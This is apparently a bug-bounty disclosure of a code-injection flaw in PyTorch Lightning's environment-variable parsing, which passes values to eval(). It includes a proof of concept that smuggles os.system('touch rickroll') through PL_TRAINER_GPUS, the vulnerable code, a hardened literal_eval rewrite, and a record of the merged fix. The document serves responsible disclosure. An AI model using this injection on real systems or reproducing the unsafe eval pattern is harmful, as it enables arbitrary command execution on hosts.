Valid

Reported on Mar 2nd 2022


Description

An attacker who can set the PL_TRAINER_GPUS environment variable can execute arbitrary commands on the host operating system as soon as the Trainer module parses its environment variables.

Proof of Concept

$ pip3 install pytorch-lightning
$ ls
$ cat poc.py
import os
from pytorch_lightning import Trainer
from pytorch_lightning.utilities.argparse import parse_env_variables

# Baseline: with no PL_TRAINER_* variable set, parsing is a no-op.
parse_env_variables(Trainer)

# The value of PL_TRAINER_GPUS is handed to eval() unchanged, so any Python
# expression placed in it runs as soon as the Trainer's environment is parsed
# (the expression is evaluated inside the library module, which imports os).
os.environ["PL_TRAINER_GPUS"] = 'os.system("touch rickroll")'
parse_env_variables(Trainer)
$ python3 poc.py
$ ls
rickroll

Colab Notebook: https://colab.research.google.com/drive/1lMPSsKN7cNWcHkh7ZBvsNkCZRcoTPJq8?usp=sharing

Impact

This vulnerability allows remote code execution on the target system in the context of the user running the program.

Occurrences

The vulnerability arises because the unsanitized value of the environment variable is passed straight to the eval() function (pytorch_lightning/utilities/argparse.py, line 124):

        # val is the raw string read from os.environ for PL_<CLASS>_<ARGUMENT>
        if not (val is None or val == ""):
            # todo: specify the possible exception
            with suppress(Exception):
                # converting to native types like int/float/bool
                val = eval(val)

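To show why the eval() call is the problem and why restricting the conversion to Python literals closes it, here is an added, self-contained re-implementation of the PL_<CLASS>_<ARGUMENT> lookup (illustrative code written for this page, not the project's parse_env_variables or its merged fix; the argument names and the SAMPLE_ENV values are constructed, and the attacker-style value is a harmless getpid() call standing in for the os.system() payload above).

```python
import ast
from argparse import Namespace
from contextlib import suppress
from typing import Any, Dict, Iterable

# Constructed subset of Trainer argument names (not read from the library).
TRAINER_ARGS = ("gpus", "max_epochs", "precision", "accumulate_grad_batches",
                "fast_dev_run", "devices", "logger")

# Constructed environment; "devices" carries an expression, not a literal.
SAMPLE_ENV = {
    "PL_TRAINER_GPUS": "2",
    "PL_TRAINER_MAX_EPOCHS": "10",
    "PL_TRAINER_PRECISION": "16",
    "PL_TRAINER_ACCUMULATE_GRAD_BATCHES": "{0: 1, 4: 2}",
    "PL_TRAINER_FAST_DEV_RUN": "True",
    "PL_TRAINER_DEVICES": "__import__('os').getpid()",  # harmless stand-in payload
}


def coerce_value(val: str, safe: bool = True) -> Any:
    """Convert an env-var string to a native type.

    safe=False mirrors the vulnerable pattern: eval() runs any expression.
    safe=True uses ast.literal_eval(), which only accepts literals (numbers,
    strings, booleans, None, tuples, lists, dicts) and raises on calls,
    attribute access or imports, so non-literal input stays a plain string.
    """
    converter = ast.literal_eval if safe else eval
    with suppress(Exception):
        return converter(val)
    return val  # not convertible: keep the raw string, nothing is executed


def parse_env(arg_names: Iterable[str], env: Dict[str, str],
              cls_name: str = "Trainer", safe: bool = True) -> Namespace:
    """Look up PL_<CLASS>_<ARG> variables and coerce the ones that are set."""
    out = {}
    for name in arg_names:
        key = f"PL_{cls_name.upper()}_{name.upper()}"
        val = env.get(key)
        if val is None or val == "":
            continue
        out[name] = coerce_value(val, safe)
    return Namespace(**out)


if __name__ == "__main__":
    print("hardened :", parse_env(TRAINER_ARGS, SAMPLE_ENV, safe=True))
    print("vulnerable:", parse_env(TRAINER_ARGS, SAMPLE_ENV, safe=False))
```

With the hardened path the legitimate values still convert to int, dict and bool, while the expression in PL_TRAINER_DEVICES is left as a string instead of being executed.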
We are processing your report and will contact the pytorchlightning/pytorch-lightning team within 24 hours. 3 months ago
whokilleddb submitted a
3 months ago
We have contacted a member of the pytorchlightning/pytorch-lightning team and are waiting to hear back 3 months ago
Carlos Mocholí validated this vulnerability 3 months ago
whokilleddb has been awarded the disclosure bounty
The fix bounty is now up for grabs
Carlos Mocholí (Maintainer), 3 months ago:

@whokilleddb, are you interested in opening a PR with the fix?

Carlos Mocholí (Maintainer), 3 months ago:

Oh, just saw you already suggested a patch. You can go ahead and open a PR to the repository.

whokilleddb submitted a
3 months ago
whokilleddb (Researcher), 3 months ago:

Hi Carlos, I just published my PR. Sorry for any errors in the contribution. Looking forward to it getting merged 😊

whokilleddb (Researcher), 3 months ago:

Hi Carlos, can you please confirm the following PR:

https://github.com/PyTorchLightning/pytorch-lightning/pull/12212

Carlos Mocholí confirmed that a fix has been merged on 8b7a12 3 months ago
whokilleddb has been awarded the fix bounty
argparse.py#L124 has been validated